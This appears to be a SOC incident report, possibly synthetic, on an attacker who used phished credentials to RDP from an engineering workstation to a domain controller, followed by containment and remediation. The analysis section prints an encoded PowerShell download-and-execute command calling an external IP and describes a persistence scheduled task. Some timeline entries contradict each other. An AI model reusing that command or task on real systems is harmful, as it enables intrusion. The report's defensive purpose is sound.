Cisco ISE Alert Details
Alert ID: ISE-REMOTE-SERVICES-1021-7842 Alert Time: 2024-02-25 14:15:33 EST Severity: HIGH (85/100) Source: Cisco Identity Services Engine (ISE) Rule: “Unusual RDP Connection to Critical Server” MITRE ATT&CK: T1021.001 – Remote Services: Remote Desktop Protocol
Alert Details:
Detection: RDP connection from unusual endpoint to domain controller
Connection Details:
Source: 192.168.45.78 (ENG-WS-045 – Engineering Workstation)
Destination: 192.168.10.10 (DC-01 – Primary Domain Controller)
User: rpatel@company.com (Raj Patel, Engineer)
Time: 14:10-14:15 EST
Protocol: RDP (TCP/3389)
Session Duration: 5 minutes
Contextual Anomalies:
User rpatel never connects to domain controllers (normal access: file servers only)
Source host is engineering workstation (not IT/admin)
Destination is critical infrastructure (DC)
Time of day: 14:10 (unusual for admin tasks)
No change management ticket for this access
Activity During Session (from EDR logs):
14:11 – PowerShell launched (encoded command)
14:12 – Attempted to enumerate AD users
14:13 – Attempted to access LSASS (blocked)
14:14 – Scheduled task created: “SystemCheck”
14:15 – Session terminated (ISE triggered)
Detection Logic:
User-to-server mapping anomaly (engineer to DC)
Behavioral baseline violation
Process activity indicative of post-exploitation
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Cisco ISE alert
ISE Console, AD Logs
Confirmed anomalous RDP connection
2. Process Investigation
Check activity on DC-01
CrowdStrike Falcon
PowerShell executed, scheduled task created
3. User Interview
Contact rpatel
Teams, Phone
User did NOT initiate RDP session
4. Immediate Action
Isolate ENG-WS-045
CrowdStrike
Engineering host quarantined
5. Account Remediation
Disable rpatel account
Azure AD, AD
Account disabled
6. Clean DC
Remove scheduled task
PowerShell
Scheduled task “SystemCheck” deleted
Jira Incident Report
Ticket: SOC-2024-127 Summary: T1021 – Unauthorized RDP to Domain Controller from Compromised Engineering Host Status: RESOLVED Resolution: MALICIOUS – Lateral Movement Blocked Priority: P1 – CRITICAL Labels: T1021, remote-services, rdp, lateral-movement, cisco-ise, compromised-account Components: Network-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Identity Services Engine (ISE).
Alert: “Unusual RDP Connection to Critical Server”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: DC-01 (Primary Domain Controller).
Time: 2024-02-25 14:15 EST.
Technique: MITRE ATT&CK T1021.001 – Remote Services: Remote Desktop Protocol.
2. Technical Analysis:
Attack Chain:
13:45 – rpatel credentials compromised via phishing
13:50 – Attacker logs into ENG-WS-045 via RDP (from external IP)
13:55 – Attacker uses compromised credentials to RDP to DC-01
14:10-14:15 – Attacker on DC-01
14:11-14:14 – Malicious activities
14:15 – ISE detects anomaly
Activities on DC-01:
PowerShell Encoded Command:
powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAxADQAMwAuADIAMgAxAFsALgA5ADgALwB1AHAAZABhAHQAZQAnACkA
Decoded: IEX (New-Object Net.WebClient).DownloadString(‘http://185.143.221[.]89/update’)
Scheduled Task Created:
Name: “SystemCheck”
Action: PowerShell to download and execute payload hourly
Status: Created but not triggered yet
Lateral Movement:
Attacker moved from compromised engineering host to domain controller
Gained foothold on critical infrastructure
Attempted to establish persistence
3. Investigation Findings:
Timeline:
13:45 – Credentials compromised
13:50 – Attacker on ENG-WS-045
14:10 – RDP to DC-01
14:11-14:14 – Malicious actions
14:15 – ISE alert
14:17 – SOC investigates
14:18 – ENG-WS-045 isolated
14:19 – rpatel account disabled
14:20 – Scheduled task removed
14:21 – Attacker RDP session terminated
Indicators of Compromise (IoCs):
Network:
– Attacker external IP: 185.143.221[.]89
– Internal RDP: 192.168.45.78 -> 192.168.10.10
Account:
– rpatel (compromised)
Scheduled Task:
– DC-01: “SystemCheck” (deleted)
File:
– C:\Windows\Temp\update.ps1 (deleted)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Disabled rpatel account.
Terminated RDP session.
Deleted scheduled task from DC-01.
Removed any downloaded files.
DC-01 Remediation:
Full scan (no other malware).
Verified no persistence mechanisms.
Credential rotation for all domain admins (precaution).
User Remediation:
rpatel password reset.
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User credentials compromised via phishing.
Contributing Factors:
No MFA on account.
RDP allowed from any internal host to DC.
Over-privileged user (engineer should not have RDP to DC).
6. Business Impact:
Operational Impact: DC-01 offline for 30 minutes for cleanup.
Security Impact: Attacker gained brief access to domain controller; persistence prevented.
7. Remediation & Prevention:
Completed Actions:
Lateral movement blocked.
DC cleaned.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Restricted RDP to DC to specific admin jump hosts (PAW).
Implemented network segmentation.
Enhanced monitoring for RDP to critical servers.
8. Conclusion:
An attacker used compromised credentials to RDP from an engineering workstation to a domain controller, performing malicious actions and establishing persistence. Cisco ISE detected the anomalous connection, enabling rapid containment. The DC was cleaned before any significant damage.
Closure Rationale: Lateral movement blocked; DC cleaned; account secured.
Analyst: [Walter White], SOC Analyst Date: 2024-02-25 15:30 EST